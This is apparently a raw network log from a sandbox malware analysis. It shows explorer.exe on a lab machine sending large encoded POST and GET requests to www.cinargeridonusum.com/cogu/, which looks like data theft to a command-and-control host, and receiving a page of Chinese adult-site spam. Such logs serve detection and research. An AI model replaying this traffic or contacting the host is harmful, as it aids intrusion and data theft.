Oct 13, 2021 15:52:59.588948011 CEST	7861	OUT	POST /cogu/ HTTP/1.1 Host: www.cinargeridonusum.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.cinargeridonusum.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.cinargeridonusum.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 58 55 6f 48 34 75 6e 46 4c 70 46 67 62 44 76 64 43 4a 72 57 36 6b 6e 42 56 75 28 7a 50 4f 76 59 31 55 32 33 6e 72 4a 62 53 41 68 6b 65 63 50 51 6c 5a 41 70 79 35 7e 56 4a 66 36 66 4d 32 42 34 62 6c 6a 77 69 39 38 56 32 42 47 31 67 74 30 78 39 46 78 58 4b 66 45 66 76 45 31 47 52 59 62 6e 37 37 50 41 45 76 38 71 35 65 36 43 48 6d 58 45 71 4a 72 39 48 73 46 79 32 38 68 4c 46 36 61 64 6e 73 49 49 4d 74 69 42 6d 49 4b 5f 63 58 31 70 31 58 71 30 37 61 34 45 42 41 58 5f 73 6c 43 58 63 4a 48 6e 50 44 64 50 61 46 6f 49 6e 6f 67 36 33 4f 64 36 46 4f 78 5f 51 33 72 39 63 4d 64 52 55 4d 39 76 57 6b 50 47 66 2d 41 5f 31 6b 71 47 6b 37 76 74 4c 54 56 48 69 36 77 2d 28 44 69 56 6e 68 59 75 67 79 52 73 31 38 77 33 59 76 6b 50 73 35 6e 66 4c 68 7e 36 53 62 4b 52 57 36 62 6c 50 6d 78 34 76 59 4f 58 4b 77 61 54 65 49 45 47 28 30 28 7a 32 31 36 69 4a 6e 49 32 36 4c 45 46 54 5f 75 57 44 71 4b 63 46 59 4e 42 30 57 49 69 78 52 64 49 62 6e 77 31 7e 4a 7e 67 53 78 28 6f 39 56 28 78 68 66 79 48 32 31 4e 59 54 47 47 35 67 78 49 30 71 2d 38 73 6b 35 63 47 34 71 4b 44 4f 41 4f 38 52 77 34 36 77 4c 4a 79 39 66 34 43 52 35 69 4b 54 76 4f 39 63 64 6a 61 6a 61 30 6b 6f 43 70 52 33 72 4e 7a 62 4e 6e 76 76 62 4f 69 28 6d 28 42 6f 5f 53 53 39 53 49 50 79 32 39 74 7a 79 28 59 56 63 42 56 53 41 4a 4d 36 4a 68 57 28 4e 78 67 30 48 77 65 6e 62 47 6a 71 39 37 6e 41 66 67 58 76 65 50 2d 51 77 67 48 4f 55 78 47 64 46 4a 63 4f 43 47 49 4a 35 6a 4c 41 34 77 6f 76 7a 7a 6f 4a 74 46 4e 46 39 68 55 79 42 61 74 55 69 63 72 71 32 63 2d 61 53 41 79 48 64 46 4d 53 78 28 44 71 41 4a 75 4d 35 6a 47 61 65 6c 4c 64 36 6c 4f 77 6f 64 45 55 77 28 63 30 71 6c 6d 57 6b 44 51 4a 6d 54 69 38 35 34 57 32 36 78 32 74 71 74 72 72 73 6a 48 74 67 6a 58 78 68 37 62 7a 4b 56 79 69 6b 59 4a 53 74 46 30 44 45 52 48 73 6d 6d 43 46 5f 56 70 36 78 66 4b 4b 6a 76 30 49 48 65 62 76 6d 76 54 52 2d 33 45 4b 68 77 67 38 43 47 75 43 79 6a 70 67 6f 6d 50 6c 6c 4e 37 55 73 37 6c 36 4c 4a 6f 7a 45 66 41 30 77 58 77 6e 6e 61 61 57 35 52 32 49 39 39 31 4b 56 63 6b 6b 59 50 53 75 33 6b 5a 68 55 43 47 5a 68 56 4a 74 55 68 44 4f 46 67 79 4a 6a 6a 78 46 52 6a 36 77 47 4c 4a 31 77 32 53 6d 39 6a 42 7a 32 45 42 75 4d 30 58 75 39 38 4f 30 47 32 55 77 44 33 4f 46 4b 42 62 4b 47 59 49 4f 30 55 48 7a 55 56 32 63 53 34 72 6b 33 4e 4e 71 51 74 47 54 58 4e 32 28 69 51 49 39 44 4a 59 72 6d 67 48 59 63 79 52 41 57 4c 63 70 41 44 4a 7e 4e 53 6c 73 48 6b 69 6e 6d 71 65 74 4e 64 34 6b 4f 74 33 4a 69 46 70 74 64 47 6e 71 42 72 66 77 34 57 61 51 62 66 70 37 42 30 43 41 78 68 37 30 56 6c 45 50 45 68 37 63 6a 67 43 67 75 44 63 42 36 30 65 57 54 64 49 46 58 61 74 70 37 53 61 44 4f 4a 6b 59 57 73 37 6c 55 39 56 30 4a 41 47 42 54 7e 76 79 61 6c 52 38 30 51 31 53 42 59 43 28 65 7e 53 48 30 44 76 61 50 47 46 4d 4b 53 6c 78 30 34 53 78 6a 6b 39 62 4e 57 37 66 46 67 69 49 73 6b 56 5a 4a 78 37 74 4b 7e 52 38 6a 68 74 38 68 79 51 47 49 75 73 70 4d 7e 59 6d 7a 53 4e 36 50 78 39 6c 4e 33 46 64 38 52 31 64 6e 32 50 73 4a 6e 51 73 6d 63 62 59 59 63 70 4f 58 57 55 73 66 36 45 6a 67 76 57 64 64 4d 31 61 5f 74 76 7a 58 59 67 72 75 28 71 41 35 34 50 37 66 65 45 36 62 69 4b 4d 30 78 69 4c 47 74 32 78 64 41 47 49 44 6e 67 47 77 7e 79 36 6a 56 34 31 61 73 45 76 77 57 36 35 4a 48 73 31 4a 64 31 47 73 43 6f 30 6a 6f 76 47 31 36 78 6f 6b 55 6c 39 70 4d 67 6d 6b 30 39 73 58 79 56 6e 30 4c 62 28 6f 5a 75 4d 4d 42 6c 6f 71 4a 32 42 6d 28 35 69 6b 77 49 32 75 68 44 37 4c 6c 68 7e 62 4f 65 7e 70 67 6e 65 6b 72 30 59 38 66 4c 76 47 33 67 6e 78 4f 68 39 5a 56 57 41 6b 43 77 39 73 6c 59 7e 4c 4f 66 6c 59 65 52 52 4e 70 6b 79 66 51 43 76 68 51 75 56 38 4a 6e 65 4d 61 42 44 37 47 30 34 5f 4f 66 61 61 65 53 36 45 31 57 6a 34 46 51 4d 6e 50 6c 62 56 53 52 6b 61 31 4d 6e 68 6d 56 6c 65 4a 68 47 6b 78 73 70 49 51 32 38 5f 32 6b 4a 4d 4b 45 42 37 6e 38 50 69 6f 50 28 38 71 71 4f 55 71 57 38 6f 47 61 64 4c 30 53 54 4d 6b 4a 5a 71 68 76 6a 4b 4b 35 48 6b 66 76 62 34 32 30 6e 64 5a 36 79 54 61 70 77 51 69 42 59 53 69 39 39 59 53 57 52 70 63 69 57 4e 38 73 4a 4b 54 51 50 5f 4a 69 4e 61 39 63 6b 66 42 58 7e 44 41 6d 48 48 52 5f 64 58 48 42 72 54 31 50 Data Ascii: E6=XUoH4unFLpFgbDvdCJrW6knBVu(zPOvY1U23nrJbSAhkecPQlZApy5~VJf6fM2B4bljwi98V2BG1gt0x9FxXKfEfvE1GRYbn77PAEv8q5e6CHmXEqJr9HsFy28hLF6adnsIIMtiBmIK_cX1p1Xq07a4EBAX_slCXcJHnPDdPaFoInog63Od6FOx_Q3r9cMdRUM9vWkPGf-A_1kqGk7vtLTVHi6w-(DiVnhYugyRs18w3YvkPs5nfLh~6SbKRW6blPmx4vYOXKwaTeIEG(0(z216iJnI26LEFT_uWDqKcFYNB0WIixRdIbnw1~J~gSx(o9V(xhfyH21NYTGG5gxI0q-8sk5cG4qKDOAO8Rw46wLJy9f4CR5iKTvO9cdjaja0koCpR3rNzbNnvvbOi(m(Bo_SS9SIPy29tzy(YVcBVSAJM6JhW(Nxg0HwenbGjq97nAfgXveP-QwgHOUxGdFJcOCGIJ5jLA4wovzzoJtFNF9hUyBatUicrq2c-aSAyHdFMSx(DqAJuM5jGaelLd6lOwodEUw(c0qlmWkDQJmTi854W26x2tqtrrsjHtgjXxh7bzKVyikYJStF0DERHsmmCF_Vp6xfKKjv0IHebvmvTR-3EKhwg8CGuCyjpgomPllN7Us7l6LJozEfA0wXwnnaaW5R2I991KVckkYPSu3kZhUCGZhVJtUhDOFgyJjjxFRj6wGLJ1w2Sm9jBz2EBuM0Xu98O0G2UwD3OFKBbKGYIO0UHzUV2cS4rk3NNqQtGTXN2(iQI9DJYrmgHYcyRAWLcpADJ~NSlsHkinmqetNd4kOt3JiFptdGnqBrfw4WaQbfp7B0CAxh70VlEPEh7cjgCguDcB60eWTdIFXatp7SaDOJkYWs7lU9V0JAGBT~vyalR80Q1SBYC(e~SH0DvaPGFMKSlx04Sxjk9bNW7fFgiIskVZJx7tK~R8jht8hyQGIuspM~YmzSN6Px9lN3Fd8R1dn2PsJnQsmcbYYcpOXWUsf6EjgvWddM1a_tvzXYgru(qA54P7feE6biKM0xiLGt2xdAGIDngGw~y6jV41asEvwW65JHs1Jd1GsCo0jovG16xokUl9pMgmk09sXyVn0Lb(oZuMMBloqJ2Bm(5ikwI2uhD7Llh~bOe~pgnekr0Y8fLvG3gnxOh9ZVWAkCw9slY~LOflYeRRNpkyfQCvhQuV8JneMaBD7G04_OfaaeS6E1Wj4FQMnPlbVSRka1MnhmVleJhGkxspIQ28_2kJMKEB7n8PioP(8qqOUqW8oGadL0STMkJZqhvjKK5Hkfvb420ndZ6yTapwQiBYSi99YSWRpciWN8sJKTQP_JiNa9ckfBX~DAmHHR_dXHBrT1PUbcYZBehkq2q1Q3N49uqHrg8NH9VFjxwpKgNkFLpU1fzsCW-7xmN5Je6U5Z9RbYjeq3Q6SmscJxZpIRVZPhuIAzBIlXjSZ84MkVcONq0spP0saFaAhWtF5uZERVJQ4ABfGUbZEqtCNByNDu7CIb3PI8n1J6hnykA8JI8lIWvkt1E~N92KCG-IkizR6gBhr1JZwwjMaqor8liOcrkiKUep3I1WfZ4opDBypH_ABFTbD0EYUni2N2T2TTePygyQY5HBN(-6bWMjHIZ2GbCiXPrJXrqyivDGE3uRX1qxSvjRmP85CynTwc0F4hJSz8eKMtVuMsaCE8vWxW7Z5b0tXgjVeuYrVC9E-tZYExVkYtoUSopsKWCbmDpJsRNJcdDjoKK9VXm6FuvfcLaD9h7E0VcuEBo1vXLjaVY0675JTqBlC8ADKm1bkT_D0ElEsrFKfhAbSMdTJb4G4tKu504xrHGjqVgC1PthzfD5ar_RjMGGCiu8TvRgRVBlQZx9b6zo4tlwHU79bTxS6XBLSs1K7tx8Run8K~ySr~Hd-IwXsxm9cWcSN1qau8cSTn9U2fr1t6cJ3P25zCAOGzzSKwfUGKYMHJb10umwM2ggDh32dOg3kJ-nDlcejSOhmESIA1khzVK3RsWMEy55YL4BajBljFU1sJM(P9JoEVU0p3ik1A7h9VZSTCZktfbyO~LavxBjROD8X(PvGB2cA~ugrgrbxe7fVUBnhyj0l9yhR5n43kkoAVv~lKHN946V5QBooosLr1EH7jfsKiGuI2DczIucqA6iErY(D7HeNmbQWZdLNdfKJ~7YISXxLdjkN~1h_vbxCGH7jAad1LF77wgKkRc7jhpoVLA0rHuhEQNx92jhMrOhog1(M64kHkbJsRxrMWY6pqR5kb6g0(fG_bd5OB9hpibz6u3gmmN~S7rSvjhwMOBzB5ouZ7ejm5OuQ2KGdZTTasCzJtsvmitK0x0NpM8xSbSPtDkWdYY2Jx-XAwJit4DmD(7DSlHQ4MBhHU_DZR2wJqQlWkVFylzrkudljC5clA5(ka3cU0hRZpvjT6ceN1JQj4L4Q(1yzwYIkBuhCwClo9S(h7JnnYQoy~xFwP7c5rhgww9ZCu5FA~w8WWaAEIgrTWW9IiQ~oNv9GTY9PbHit65tLhYolAlhTtRfehwtOtByNQAVEf5sRuswQGg0_oQ59TmH8YRMTNE5DKEzUlD2Esk8PklqYTjHKhKiD3waz7jDg2yHxjLzjtHqxa9ddVQb4rL2FbDkMCoW0ImmqpEMLwhRDGGq0CbS5fj~eyPgTc2DoEF~Q1GFpO_ALniJKfKO0pTjxHri9wWzWFGMuuYXMabr1M8k8~S5ZDc8byz82YRg9Vh3Rr02l8u2EhdhqN1cp4wCC7rhSef8r8kX9076q~ktyzON5h6x3ecCfWUnMZyJ6TRwUHib-1bdo~tASzJfgKwakfL14EO8Azy7P3e6kiT0T780o(3oAmgVzr9l7HVI0bfjxp10mIoQrNsDGwjMXj9QBMcyPz1FnpuUypElVBXQZ~JEo9RiJt6sfBtTK7cSHRrnrDxaxzDmTZzqAYM(9qtgzJbK1yoIRQA569qKmjJ6hR1~soAG3f8EnJktR4aN1EZmQ8lz0VWn3IdXP9EYhq3Fza4qEpD7m9dcPCCzEoFG0m9WUrQrmrfFggYZKG3ge3Ab65zNoXro2YSj4SM7tQyGdU3YZndy8G4UND9Rl9is8ZbqGWLuYamtomwi6OPj8s2wcxuymlhc89tlGrCydfY43YcvSL-54fZ7EKseHSqqF8V3Q5nhu0EOKsUwyzobQSLTMa46NEZBy~QJhdeiSbectiFN7L0kQUUM0Y5Im8GW4l_2em1XPpU65fSWeCEEKnBeRQ3kD2H4a1CmbFUTNzM(1aLF9Ps~DsxIHpXGWgSrv8iHBUhoNOLeIGf6gg_Fz2TdfGpqs4F19JXfpio8gwpAgbOafeqKc7TVXaQSSkjNt4APANGBdnS8a8mw5QQVT1n6_cAFi9-m_1R1_ArYs6kUPSqOmoCZyB1S4wth05nfmxstLsTCc8Znz4GiG4lszhnS5fBwnDKZnJUHfMaP3P4YjtJG40rcK3nSpiSbEWU4Na_TX4nO3IoB4yJv696QtzUCQFEaZ0pBEjBY37m8g8n1OhogRHLeijoXpKR6H1TSLVPyfubFhT1g79dt8YVXpSnEFeWPMAkQF2WpWKHo9SpgdB1asy9taAUXFg4D7YMRwYJ8S77Cjp6Y5fE0X6ZEV6odHrNkC9p758ZqqvXav6Q3pA3HeEpG8(xCMGS0w~G3i~mVwyx9m1pltjd2llOPHS7W_m0Gy0lXeHauFsOQkl1XNfoGCWSTP8ELRl27KHamDLcHNqEWcjhJdEYQ1XoVdMDo-omGHKBVdD-rW(DHcsC(mRVrDlJjQVCAAA5ESTZPvvnu4nL0JeXavF6HMYrGGIIXld4DutaGQZoHNeJ4pOtTwdpx2~2vkqzUUIMkWsWgRquA5Mm1a8lbEczvZUrDX9qmgmDoWIWWyKX84M2E-N0WYNyw28ZudiYMayHwmy_RkYmDOYmJpZYOaK-FWzh8T95QO8HCTm8Ggy-SiPY4YJkDkmEAD6zobb2K91nfB2W(2rc21ZtCd162KznK2o4l-vWfantxgAmlzDKP8WWlEWj~Dp2akUwqfo3jAmbdCJedHJwy3YfovhABcrUSpeSU5MlWIQA1vMWx7u
Oct 13, 2021 15:52:59.813791990 CEST	7864	OUT	Data Raw: 31 49 69 74 54 41 28 36 67 70 69 6c 36 32 6c 74 5a 45 62 79 4c 4d 7e 67 61 5f 43 50 41 47 68 62 62 74 77 48 79 58 34 4a 57 56 67 42 56 79 45 52 72 4e 31 31 65 69 76 49 46 6e 6b 57 61 63 56 47 36 67 30 72 4d 71 6a 74 55 50 64 69 74 69 65 38 30 61 Data Ascii: 1IitTA(6gpil62ltZEbyLM~ga_CPAGhbbtwHyX4JWVgBVyERrN11eivIFnkWacVG6g0rMqjtUPditie80a3QLxU4uiShZ0IJM6I2INVp5s5J(Mc8wgj1APyfdnNsPIPVsoNDTpWHOv9H88MdeSyZGufl9ECIxqPb2LTLrhoZj7POalc56qoxF866jkV7poKA(B4LLtuDjheqp2i3Dqk5djbs4v71DXsINlXPcmRFuyapkGbtYW8
Oct 13, 2021 15:52:59.813899994 CEST	7879	OUT	Data Raw: 66 34 6b 45 28 47 51 6d 46 54 58 32 50 66 4e 78 58 4d 62 70 69 4c 6e 6a 53 5f 36 7a 47 69 59 52 48 78 36 74 58 66 71 61 59 4e 44 35 6e 66 5a 37 67 72 66 6e 6a 45 6a 4e 37 61 42 42 48 43 49 6c 64 79 38 70 69 4b 5a 37 41 74 48 34 37 57 74 6b 37 6b Data Ascii: f4kE(GQmFTX2PfNxXMbpiLnjS_6zGiYRHx6tXfqaYND5nfZ7grfnjEjN7aBBHCIldy8piKZ7AtH47Wtk7k84bwe8kuLQnQHNkIE68K~6VdVRYSc14Yp4dCUOSRJeOgUkMXTxcvvd8enunmVGFnsLlQerfBYRSIgy(b3yxVyM5U7hqSsdBP~1~LJybaL-y-xs4-ux7UED3C80NXkIHCeuYq3BQ5d-wdwVBxeqOvAmXfd6yc4gJ4S
Oct 13, 2021 15:52:59.813971996 CEST	7883	OUT	Data Raw: 50 71 44 31 67 51 53 6f 6c 52 6a 76 4b 77 47 72 47 6b 30 41 62 66 33 4c 74 30 71 38 65 67 50 6d 58 70 38 4e 32 47 39 6a 34 5f 61 64 68 72 4b 52 71 6f 35 52 72 61 52 62 6b 37 67 41 33 6c 44 30 6d 4d 4b 41 4e 6c 54 7a 58 35 71 65 69 58 28 36 38 67 Data Ascii: PqD1gQSolRjvKwGrGk0Abf3Lt0q8egPmXp8N2G9j4_adhrKRqo5RraRbk7gA3lD0mMKANlTzX5qeiX(68gGwzNVVlwKRPMG1t8NfOHc4rAMc58HxxWWyyPNWGKWyAznz1cdYU6dMu1J83lIaVi2kNQwI(E7wkCfZfN3Gs7(a1i9CKNfQC9ga1nwr(ZM10fvbskwdbRrErc2ImZAJie6exQPIy3M-4g7GofFb8HqwcmYvVW~zn82
Oct 13, 2021 15:53:00.038657904 CEST	7892	OUT	Data Raw: 64 59 6d 34 61 43 44 5a 5a 45 49 32 36 32 47 79 53 78 4c 4b 4f 4d 4f 6a 76 6c 58 5a 71 68 76 44 6b 68 77 65 55 6c 62 71 69 47 6a 6a 7e 4d 4f 37 6c 7a 66 4c 4b 5f 59 43 76 62 66 4f 79 47 4b 39 58 73 31 52 7a 5a 64 58 36 33 33 6c 63 68 48 39 33 50 Data Ascii: dYm4aCDZZEI262GySxLKOMOjvlXZqhvDkhweUlbqiGjj~MO7lzfLK_YCvbfOyGK9Xs1RzZdX633lchH93PZrBpAAsJATSuFt~imV7tdltwYw6GtkJIuyvNbtqwx2l68rTgAxbvy5wnoTa_IrsxFnXbRWwjVAZLSvQUXX5kkCDAmUG5SzJlm6NYarkU2gbXQo85coOgAC(dO-uCTCS_C_dqih(qYq~rUfDUTWoFTIiCA2quEpP_l
Oct 13, 2021 15:53:00.038784981 CEST	7907	OUT	Data Raw: 6b 73 71 35 4d 52 78 59 4c 41 4b 6a 28 2d 6d 39 57 43 51 49 30 4b 57 58 28 34 6f 37 39 7a 6e 58 6a 55 77 36 6c 5a 4b 67 4a 7a 48 50 6a 5f 46 47 33 4b 64 35 62 6e 47 47 41 64 64 67 5a 6a 71 5a 38 7a 28 63 4f 64 72 63 70 6f 37 4d 74 4d 76 6d 5a 69 Data Ascii: ksq5MRxYLAKj(-m9WCQI0KWX(4o79znXjUw6lZKgJzHPj_FG3Kd5bnGGAddgZjqZ8z(cOdrcpo7MtMvmZi9OuM(rj1jiHyS5hLX3Jqysv7i-VobTiGGEC7EWYlnZNvvAFiJ_GcbVDbp5vdF0YjIZCs8Q1bARpC75gYjyilml8LEqQsvy9PuMWHJTj84yxmVetiZDIXG4pQ~83DSR9rK2pnlObJ7VKvBH5459dqU6uSO1lK403JT
Oct 13, 2021 15:53:00.039283991 CEST	7916	OUT	Data Raw: 7e 4a 52 59 41 77 79 52 36 34 42 61 49 4d 6c 41 79 31 4c 63 66 6d 68 32 35 62 61 6f 61 36 5a 72 4f 49 77 77 7a 33 4d 37 75 37 76 54 59 37 37 79 69 4a 6c 6d 34 51 67 70 53 39 4f 6b 55 66 31 70 43 76 46 36 44 41 41 6a 59 6a 51 70 78 37 4d 41 63 6b Data Ascii: ~JRYAwyR64BaIMlAy1Lcfmh25baoa6ZrOIwwz3M7u7vTY77yiJlm4QgpS9OkUf1pCvF6DAAjYjQpx7MAckfIq_h_W2sKfLwyfTNDCos2hSkJ0vU84MdYH3tKhYx4VQ4KY7IpwHUVOPr53KJ3VtSdF2wqHX(uJ6vjk3vIS3wNo7JKyJiL4ECtmuL2(yYN5Rd3MIq624KCAFi55QxxviwqrZQdn3afF27bIPjlwfiex9IqnBp2NeI
Oct 13, 2021 15:53:00.039468050 CEST	7925	OUT	Data Raw: 67 56 46 4d 38 73 4a 58 66 71 51 6c 77 6c 49 30 47 67 6e 71 61 54 31 4e 54 61 74 50 75 72 73 31 77 4e 69 4a 58 34 58 38 4e 4f 6f 63 4b 51 53 35 67 71 7a 42 42 33 43 2d 44 50 78 72 4a 73 4a 39 58 75 6f 61 6f 64 6f 64 6f 32 34 46 32 5f 70 75 72 48 Data Ascii: gVFM8sJXfqQlwlI0GgnqaT1NTatPurs1wNiJX4X8NOocKQS5gqzBB3C-DPxrJsJ9Xuoaododo24F2_purHs2WkocQFwFUWuUf1vIOaxlt-GRvgkhLfmcwp8JWwxbxEisBPYrQMD547dpx3d2Uq2cyJyCiYrW0D8I(mHWukr_5w4tgM74T7WqI4NGFBpzhOK3Y-HjDYB3l7i1M7hiLEaKQXIsSqlHkojce0~cBQbGnk3UzXjj~wE
Oct 13, 2021 15:53:00.263822079 CEST	7946	OUT	Data Raw: 57 63 30 4e 49 6a 77 6e 51 5a 51 76 4b 6b 6b 4c 28 6f 58 56 51 74 4a 74 7e 76 34 37 30 5a 56 54 72 58 4f 74 44 41 6b 57 63 50 31 74 65 36 68 6a 66 6f 75 65 69 6e 31 4e 57 34 55 50 77 33 44 45 74 7a 48 43 66 34 4e 52 70 4d 4d 37 70 4d 30 79 70 55 Data Ascii: Wc0NIjwnQZQvKkkL(oXVQtJt~v470ZVTrXOtDAkWcP1te6hjfouein1NW4UPw3DEtzHCf4NRpMM7pM0ypUNvOBvV2_bPz5xR0r3_aP9_~dQO7qhTECzsFpm_AZ9zQCZyj4HBi-S0yAATLFon0E2E2uGnqhCxUajKFys118Wi(0VUmBpM3V2ZY-u0bdLi6rO9zI1emeKdZBQUS_V8X5hX2DB51EcJinKtK6y0Uh9K0aeRKISGuiW
Oct 13, 2021 15:53:00.263958931 CEST	7949	OUT	Data Raw: 62 6e 71 47 4e 67 33 57 71 38 66 5f 42 31 30 31 56 59 6c 46 4b 41 52 59 71 2d 56 33 6d 51 6b 4c 55 34 5a 77 30 6c 58 47 4a 67 76 57 6d 66 54 74 68 53 6b 76 66 49 64 4f 72 4c 43 7a 64 63 42 4f 51 55 4f 48 7e 52 75 72 66 4b 4f 34 63 63 67 6f 6d 61 Data Ascii: bnqGNg3Wq8f_B101VYlFKARYq-V3mQkLU4Zw0lXGJgvWmfTthSkvfIdOrLCzdcBOQUOH~RurfKO4ccgomakyngn8lg2UsvfC8U143qdyJ3zXG6ltvIdaGe2eNTLj4pQpKhYboCADsqfiwezYyKG9vpcVTLF21SAL4djqCe9CvF9VkAewqDcauNb-XTtKa75ZvJ8vfkK3VL3FTA2JP7eQqIrE7wR2XDO9zA51VCj3ws1Ml8odOY5
Oct 13, 2021 15:53:00.264514923 CEST	7959	OUT	Data Raw: 64 61 44 34 6d 31 72 68 78 34 4b 4c 42 63 57 6a 4f 65 59 34 71 56 6f 47 78 31 75 75 37 5f 6b 50 6a 70 47 69 74 71 6d 76 5a 5a 42 4d 50 66 7e 75 55 62 30 58 74 42 55 37 48 68 49 72 7e 4c 6b 5a 42 78 47 45 72 55 6a 4b 61 41 75 52 36 48 51 69 4c 49 Data Ascii: daD4m1rhx4KLBcWjOeY4qVoGx1uu7_kPjpGitqmvZZBMPf~uUb0XtBU7HhIr~LkZBxGErUjKaAuR6HQiLIQdmDgZwlMqEgtw1iV7~YSwXnUInbnyd2YJHtffBydzmbOiLnTmqOCbH4Lj(eFc~5qQXWJBqA8vdhouPjuc2H~VDQmBV8ea~BfQNxl784xQWZnN7J2zc_E-SuXTwln3(lm9kpXigDIfn3vQ1Twme2acKBKOWp31Tty

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.11.20	49845	154.215.231.81	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:59.814057112 CEST	7883	OUT	GET /cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1 Host: www.cinargeridonusum.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:00.043307066 CEST	7927	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Oct 2021 13:52:59 GMT Content-Type: text/html Content-Length: 1824 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 bb aa b1 b1 ce cb b1 d2 cd b6 d7 ca b9 dc c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 37 33 32 36 3b 26 23 33 33 34 35 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 5f 26 23 33 35 38 34 31 3b 26 23 33 32 34 37 33 3b 26 23 32 30 30 31 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 31 38 33 34 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 35 30 3b 26 23 34 39 3b 5f 26 23 32 37 37 30 30 3b 26 23 32 31 34 30 37 3b 26 23 32 36 37 39 32 3b 26 23 33 33 34 35 37 3b 26 23 33 32 39 30 35 3b 26 23 32 37 34 34 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 5f 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 31 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 36 36 3b 26 23 38 34 3b 26 23 33 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 37 33 32 36 3b 26 23 33 33 34 35 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 5f 26 23 33 35 38 34 31 3b 26 23 33 32 34 37 33 3b 26 23 32 30 30 31 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 31 38 33 34 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 35 30 3b 26 23 34 39 3b 5f 26 23 32 37 37 30 30 3b 26 23 32 31 34 30 37 3b 26 23 32 36 37 39 32 3b 26 23 33 33 34 35 37 3b 26 23 33 32 39 30 35 3b 26 23 32 37 34 34 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 5f 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 31 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 36 36 3b 26 23 38 34 3b 26 23 33 32 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 37 33 32 36 3b 26 23 33 33 34 35 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 5f 26 23 33 35 38 34 31 3b 26 23 33 32 34 37 33 3b 26 23 32 30 30 31 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 31 38 33 34 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 32 34 36 31 33 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 35 30 3b 26 23 34 39 3b 5f 26 23 32 37 37 30 30 3b 26 23 32 31 34 30 37 3b 26 23 32 36 37 39 32 3b 26 23 33 33 34 35 37 3b 26 23 33 32 39 30 35 3b 26 23 32 37 34 34 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 35 37 37 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>野花视频在线观看视频_谁给个网站啊急急急2021_水原梨花肉欲在线播放_午夜私人成年影院在线观看BT </title><meta name="keywords" content="野花视频在线观看视频_谁给个网站啊急急急2021_水原梨花肉欲在线播放_午夜私人成年影院在线观看BT " /><meta name="description" 